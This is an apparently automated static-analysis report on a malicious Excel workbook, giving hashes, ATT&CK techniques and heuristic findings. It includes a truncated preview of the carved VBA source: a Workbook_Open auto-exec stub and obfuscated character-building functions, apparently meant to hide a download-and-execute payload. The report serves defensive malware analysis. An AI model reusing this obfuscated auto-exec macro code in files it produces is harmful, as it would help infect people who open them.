Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 cb4149d1188e6b91…

Verdict: MALICIOUS

File type: Office (OOXML)
Size: 82.3 KB
Created: 2021-06-23 08:35:37 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-07-02
MD5: 3c636bbf1232d770df7a7084dffcf7b2
SHA-1: c5402ca6b42890bc5d785c4293872100039dffd4
SHA-256: cb4149d1188e6b915625a730cbafdc607a5cf1eacfc695e36960b81c7303a494
Risk score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1037.001 Boot or Logon Initialization: Script Based

The OOXML file contains a Workbook_Open VBA macro, a common technique for executing malicious code as soon as the document is opened. The macro calls CreateObject and appears to be designed to download and execute a second-stage payload, although the exact download URL and payload are obfuscated. The presence of a Workbook_Open macro together with the use of CreateObject strongly suggests malicious intent; delivery via spearphishing attachment is likely.

Heuristics (4)

  • VBA project inside OOXML (severity: medium; 3 related findings; OOXML_VBA)
    Document contains a VBA project: VBA macros present
  • Workbook_Open macro (severity: high; OLE_VBA_WBOPEN)
  • CreateObject call (severity: high; OLE_VBA_CREATEOBJ)
  • VBA p-code auto-exec with execution tokens (severity: high; OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents where source extraction failed, so that visible source is unavailable.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

  • macros.bas
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
    Size: 35260 bytes
    SHA-256: 6b201d965f6534a26a2e5e6360455574d5d22d4fdfbfe68cfa784e9f1c0e2ba3
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
fvm_f_jccddbau = (Module1.pckllmgfzhqzjun())
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module4"
Function aikrn_k_z_gsmqu(ldqnhv_umj_sc_o)
aikrn_k_z_gsmqu = Chr(CLng((-534 + 589))) & Chr(CLng((47 And 60))) & ChrW(CLng((33 Xor 16))) & ChrW(CLng((51 And 53))) & Chr(CLng((941 - 889))) & Chr(CLng((8 Or 44))) & ChrW(CLng((-4.51977401129944E-02 * -708))) & Chr(CLng((-226 + 275))) & ChrW(CLng((16 Or 48))) & ChrW(CLng((53 Or 21))) & ChrW(CLng((Not -45))) & Chr(CLng((99 + -50))) & ChrW(CLng((49 And 49))) & Chr(CLng((10 Xor 60))) _
  & Chr(CLng((935 + -891))) & Chr(CLng((49 And 53))) & ChrW(CLng((5.04032258064516E-02 * 992))) & Chr(CLng((Not -50))) & Chr(CLng((-577 + 621))) & Chr(CLng((768 + -712))) & ChrW(CLng((48 Or 32))) & Chr(CLng((32 Or 12))) & Chr(CLng((Not -33))) & ChrW(CLng((Not -50))) & ChrW(CLng((36 Xor 21))) & Chr(CLng((52 Or 4))) & Chr(CLng((59 Xor 27))) & Chr(CLng((4.34353405725568E-02 * 1013))) _
  & ChrW(CLng((Not -50))) & Chr(CLng((0.340277777777778 * 144))) & ChrW(CLng((8.49220103986135E-02 * 577))) & ChrW(CLng((-70 + 114))) & Chr(CLng((-698 + 747))) & ChrW(CLng((729 - 680))) & Chr(CLng((-841 + 895))) & Chr(CLng((23 Xor 55))) & Chr(CLng((4.23892100192678E-02 * 1038))) & ChrW(CLng((-108 - -140))) & ChrW(CLng((Not -50))) & Chr(CLng((891 - 842))) _
  & Chr(CLng((63 Xor 14))) & ChrW(CLng((-6.97305863708399E-02 * -631))) & ChrW(CLng((57 Or 32))) & Chr(CLng((-323 + 380))) & ChrW(CLng((40 And 35))) & ChrW(CLng((0 Or 44))) & Chr(CLng((0.127937336814621 * 383))) & ChrW(CLng((Not -50))) & Chr(CLng((61 And 49))) & Chr(CLng((722 - 678))) & ChrW(CLng((Not -33))) & Chr(CLng((-874 - -923)))
Debug.Print aikrn_k_z_gsmqu
End Function
Function nmcdxpcmiheqtze(kxletww_obpnua)
nmcdxpcmiheqtze = ChrW(CLng((-653 - -701))) & Chr(CLng((-343 + 399))) & Chr(CLng((62 And 45))) & ChrW(CLng((6.15199034981906E-02 * 829))) & Chr(CLng((59 And 50))) & Chr(CLng((-68 + 100))) & ChrW(CLng((44 And 47))) & Chr(CLng((795 - 741))) & Chr(CLng((49 Or 33))) & ChrW(CLng((8 Or 36))) & Chr(CLng((587 - 536))) & ChrW(CLng((-546 + 596))) & ChrW(CLng((12 Or 32))) & Chr(CLng((115 + -64))) _
  & ChrW(CLng((6.71834625322997E-02 * 774))) & ChrW(CLng((58 + -26))) & Chr(CLng((Not -45))) & Chr(CLng((-0.112280701754386 * -285))) & ChrW(CLng((416 + -367))) & ChrW(CLng((48 Or 33))) & ChrW(CLng((-730 + 784))) & ChrW(CLng((6.68693009118541E-02 * 658))) & ChrW(CLng((-3.74707259953162E-02 * -854))) & ChrW(CLng((-575 - -624))) & ChrW(CLng((-398 - -446))) _
  & Chr(CLng((-907 + 963))) & ChrW(CLng((-813 + 845))) & Chr(CLng((54 Xor 26))) & Chr(CLng((32 And 56))) & Chr(CLng((6 Xor 55))) & ChrW(CLng((1003 + -954))) & ChrW(CLng((-534 - -587))) & ChrW(CLng((46 And 44))) & ChrW(CLng((55 And 52))) & Chr(CLng((Not -58))) & Chr(CLng((0 Or 32))) & Chr(CLng((680 + -636))) & ChrW(CLng((53 Or 1))) & ChrW(CLng((27 Xor 43))) _
  & ChrW(CLng((-521 - -565))) & Chr(CLng((-7.92682926829268E-02 * 
... (truncated)
  • vbaProject_00.bin
    Kind: vba-project
    Source: OOXML VBA project: xl/vbaProject.bin
    Size: 78848 bytes
    SHA-256: 54373a0534838ab5ca94434524e9757f7d9beae24cce21e7e55a3ec6a20bfba9